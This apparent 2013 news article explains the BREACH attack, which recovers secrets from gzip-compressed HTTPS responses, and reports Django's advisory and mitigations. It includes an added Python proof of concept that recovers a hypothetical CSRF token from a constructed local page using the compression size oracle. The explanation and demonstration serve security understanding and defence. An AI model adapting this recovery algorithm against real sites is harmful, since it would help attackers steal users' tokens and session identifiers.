The BREACH attack allows attackers to recover secrets from compressed HTTPS traffic

Aug 7, 2013 07:33 GMT  ·  By

At this year's Black Hat conference in Las Vegas, researchers demonstrated a new attack against HTTPS traffic. Dubbed “BREACH,” short for Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext, the technique can recover secrets such as CSRF tokens and session identifiers from HTTPS responses in a matter of seconds. It works when the server compresses the response body with gzip or DEFLATE, the body contains both the secret and some text the attacker controls (for example a reflected query parameter), and the attacker can observe the size of the encrypted responses while causing the victim's browser to make requests. Unlike the earlier CRIME attack, which exploited TLS-level compression, BREACH targets HTTP-level compression of the response body, so disabling TLS compression alone does not stop it.

The attack was discovered and presented by Angelo Prado, lead product security engineer at Salesforce.com, Neal Harris, application security engineer at Square, and Yoel Gluck, lead security engineer at Salesforce.com.

“This relies on the attacker being able to observe the size of the cipher text received by the browser while triggering a number of strategically crafted requests to a target site,” reads a report from Prado that was picked up by US CERT.

“To recover a particular secret in an HTTPS response body, the attacker guesses character by character, sending a pair of requests for each guess. The correct guess will result in a smaller HTTPS response. For each guess the attacker coerces the victim's browser to issue two requests,” the advisory continues.

“If the size of the first response is smaller than the second response, this indicates that the guess has a good chance of being correct.”
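The size oracle the advisory describes, as an added example that is not code from the researchers, US-CERT or Django: a constructed HTML page echoes an attacker-controlled query parameter and, further down, carries a hypothetical CSRF token in a logout link. For each guess the attacker's two requests put the candidate character either directly after the known prefix or after a separator; only the correct character lengthens the LZ77 match between the echoed text and the token, so only then is the first compressed response smaller. The page, the token, the prefix and every function name are assumptions. Fixed Huffman coding (zlib's Z_FIXED strategy) is used so that the size difference depends on the match length alone; real servers use dynamic Huffman codes, which add noise the attackers handle with more request pairs.

```python
"""Size oracle behind BREACH on a constructed page (example code, not from the
researchers, US-CERT or Django). Names, page and token are hypothetical."""
import zlib

SECRET_TOKEN = "3f9a7c2e1b4d"      # hypothetical CSRF token embedded in the page
KNOWN_PREFIX = "csrftoken="        # text the attacker knows precedes the token
HEX = "0123456789abcdef"           # token alphabet
PAD = "{}"                         # separator that occurs nowhere else in the page


def render_page(reflected: str) -> bytes:
    """Constructed server response: echoes an attacker-controlled query
    parameter and, further down, carries the CSRF token in a logout link."""
    html = (
        "<html><body>\n"
        f"<p>Search results for: {reflected}</p>\n"
        "<ul>\n"
        '<li><a href="/items/one">one</a></li>\n'
        '<li><a href="/items/two">two</a></li>\n'
        '<li><a href="/items/six">six</a></li>\n'
        "</ul>\n"
        f'<a href="/logout?csrftoken={SECRET_TOKEN}">Log out</a>\n'
        "</body></html>\n"
    )
    return html.encode("utf-8")


def observed_size(reflected: str) -> int:
    """Byte length of the DEFLATE-compressed body an on-path attacker sees.
    Z_FIXED keeps every symbol's bit cost constant, so any size change comes
    from the LZ77 match alone; real servers use dynamic Huffman codes, which
    add noise the attack must average out with extra requests."""
    comp = zlib.compressobj(6, zlib.DEFLATED, 15, 8, zlib.Z_FIXED)
    return len(comp.compress(render_page(reflected)) + comp.flush())


def alignment_junk(k: int) -> str:
    """k distinct two-byte UTF-8 characters (U+00C0..U+00C7). Under fixed
    Huffman coding each costs 17 bits, so k = 0..7 walks the stream's final
    byte boundary through every bit alignment; a saving of a few bits then
    shows up as a whole-byte difference for at least one k."""
    return "".join(chr(0xC0 + i) for i in range(k))


def guess_score(known: str, candidate: str) -> int:
    """The advisory's pair of requests per guess: known+candidate+PAD versus
    known+PAD+candidate. Only a correct candidate extends the LZ77 match
    between the echoed text and the token, so only then is the first response
    smaller. Summed over the eight alignments: negative if correct, zero if not."""
    score = 0
    for k in range(8):
        junk = alignment_junk(k)
        first = observed_size(known + candidate + PAD + junk)
        second = observed_size(known + PAD + candidate + junk)
        score += first - second
    return score


def recover_secret(known_prefix: str, alphabet: str, max_len: int = 64) -> str:
    """Recover the token one character at a time. Stops when no candidate
    shrinks the response, i.e. when the next page character is outside the
    alphabet (here the closing quote of the href)."""
    known = known_prefix
    for _ in range(max_len):
        scores = {c: guess_score(known, c) for c in alphabet}
        best = min(alphabet, key=scores.__getitem__)
        if scores[best] >= 0:
            break
        known += best
    return known[len(known_prefix):]


if __name__ == "__main__":
    print(recover_secret(KNOWN_PREFIX, HEX))
```

The attacker never sees plaintext: the only input to the decision is the length of each response, which TLS does not hide. The same code also shows why the mitigations below work: with compression off, every variant of the page is the same size and guess_score is zero for every candidate, and if the page embedded a differently masked copy of the token in every response, the echoed guess would have nothing stable to match against.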

After the news broke, the Django project issued a security advisory warning users that BREACH can be used to defeat Django's CSRF protection, since the CSRF token is embedded in rendered pages and can be recovered from compressed responses.

Django advises users to disable Django's GZipMiddleware, or to turn off gzip compression in the web server's configuration, depending on how the application is deployed.

“Additionally, you should make sure you disable TLS compression by adjusting your server's SSL ciphers,” Django noted.

The framework's developers plan to address BREACH in Django itself; in the meantime, users are advised to take the steps above to protect their deployments.